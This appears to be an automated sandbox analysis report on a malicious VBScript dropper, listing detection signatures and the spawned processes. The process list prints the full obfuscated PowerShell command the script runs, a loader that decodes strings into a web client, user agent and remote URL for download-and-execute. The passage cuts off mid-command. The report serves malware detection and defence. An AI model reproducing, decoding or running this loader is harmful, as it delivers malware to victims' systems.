Edit tour
Windows
Analysis Report
Sentinelled.vbs
Overview
General Information
Detection
Score: | 100 |
Range: | 0 - 100 |
Whitelisted: | false |
Confidence: | 100% |
Signatures
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
VBScript performs obfuscated calls to suspicious functions
Yara detected Powershell download and execute
AI detected suspicious sample
Found suspicious powershell code related to unpacking or dynamic code loading
Potential malicious VBS script found (suspicious strings)
Sigma detected: WScript or CScript Dropper
Suspicious execution chain found
Suspicious powershell command line found
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Wscript starts Powershell (via cmd or directly)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
HTTP GET or POST without a user agent
JA3 SSL client fingerprint seen in connection with other malware
Java / VBScript file with very long strings (likely obfuscated code)
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Suricata IDS alerts with low severity for network traffic
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Very long command line found
Yara signature match
Classification
- System is w10x64
- wscript.exe (PID: 4932 cmdline:
C:\Windows \System32\ WScript.ex e "C:\User s\user\Des ktop\Senti nelled.vbs " MD5: A47CBE969EA935BDD3AB568BB126BC80) - powershell.exe (PID: 2104 cmdline:
"C:\Window s\System32 \WindowsPo werShell\v 1.0\powers hell.exe" "echo $Ste nternstant iates; fun ction Husk ing($Sickl emia){$Afm ilitariser ingers=4;$ Stenter=$A fmilitaris eringers;d o{$Musikgr uppens+=$S icklemia[$ Stenter];$ Stenter+=5 } until(!$ Sicklemia[ $Stenter]) $Musikgrup pens}funct ion Batike r179($Folk etingsvalg enes){ .($ opsamlings beholderne s) ($Folke tingsvalge nes)}$opsa mlingsbeho lderens=Hu sking ' tr nForsEBomu t Dep.Sedd W';$opsaml ingsbehold erens+=Hus king ' Vul EUn.uBKont CIn.eLPsam iSupeEafsk NSr uT';$L oppier=Hus king 'Byst MDrifo H m z .aaiNons levaclUn o aAbor/';$J alousidram aet=Huskin g 'FintTVe nll rudsR ff1 bo 2'; $Mhorr='Mi d [ RanN.n imES yntPr st.SlagsEm boEApanr m pVHelaIBec acTrefESan spSkopoBeg oI SnoNCha rT Va,mF s kA C tN.am maInd.gFor bEStyrR Q t]Lyco:Mod t:K.imsDis mE arecMan ou Ta R Vl giInortAar eyproepsyn srYeasO Sl Tenmao Vo lcLtero Fu lL Ver=D,e d$K.lejKam eAEdlalLay eOAnd.upre ssDel,I Ke tdHoveRBra gaBaadM in tA Im EE e kT';$Loppi er+=Huskin g 'Fi l5.o mm.Desp0H ck Besk(Po liWFraniOv rn MocdAm feo onw F, rsL nk Kom mNkiriTEst h ,lem1Sld e0In v.Tu n0 Muf;Omg a OstWNond iHummnSou 6Elsd4 Apo ;Ster Pi,f xSlag6 Va. 4Nons;Vent Euour Sna v Gro:Hale 1 Ent3.voi 1 Ame.Bygg 0Intr)a ve coauGAnil eMenacFlar kPostoRubi / Kon2tat 0L.co1Tell 0,bor0Snar 1Bytn0Tabu 1 Sti MecF DemiiBundr Bile Emif fmoSporxg lau/Pref1R egi3Met.1A ge .soli0' ;$Nedslide ndes=Huski ng '.ontUA .stSTeleEB lepR Mes-P edaA ColgD es,eBrnen HalT';$Kje rstines=Hu sking 'Arv hForvtOpi rtBlodpMel usOrbi:Ene a/Lang/Ven uoOpalfSys t1F ktxHug u.AfskiUdr ac hrouFi. d/EuphYYu ekSoigHFar tf.edlh Fr lYFl,sCArc aF.igh/ on sghentlKra iHa,daBek .dO tsiPre an ConeMod esPs k.St. lpLabof S nb';$Unsig hted=Huski ng ' Met>' ;$opsamlin gsbeholder nes=Huskin g 'Pre ISe lveInd x'; $Besprinkl e='Liberti ne';$Beska aret='\Unm idwifed.Su r';Batiker 179 (Huski ng 'skum$S hilGCit l Ek.o GraBC hriaTabel Col:HoredE ghorCwm.y yklaHjrnsA l.c= ata$ ShaE FisNT ypeVCest:U a sA.acePO .rypSk kD ResaErv TI ncoAPse + obe$heydbV ocaeTracS ,orktr.pAU ncoa illRF akteNo rt' );Batiker1 79 (Huskin g 'Agla$A, stgsurmL D isODirgB l inAuntrLFr ed:sproZSk keo Albl H raSkabePr oesOnonQPa asuOdyse S cr=Is.m$Nv neK m,ljAf sieSkdeRMi liSRh,nt c tuIRustnPa leENl.tS,e gi.AppeS D i PFumel I nditextt W e(.tev$Ch rouVikiNSk risRefiiHa ndG himhTr ilTDrosEV njdAsfa)') ;Batiker17 9 (Husking $Mhorr);$ Kjerstines =$Zolaesqu e[0];$Unpl acement=(H usking ' T ra$PersGSa n.L ,erOHe deB Th a.e seLAcme:Su tssSadeUAf tenModeB B acU ErgrTu yeNDaliIAr hnChroG f t=.uttN ,o rENumaWV l t-UretoGa vB vej pos EDrilcWind tvejv F te sDextyInte S,itmTRetm e Fi m Fag . Sol$Supe oS quPnonr SBawdAOrch mGoo l arc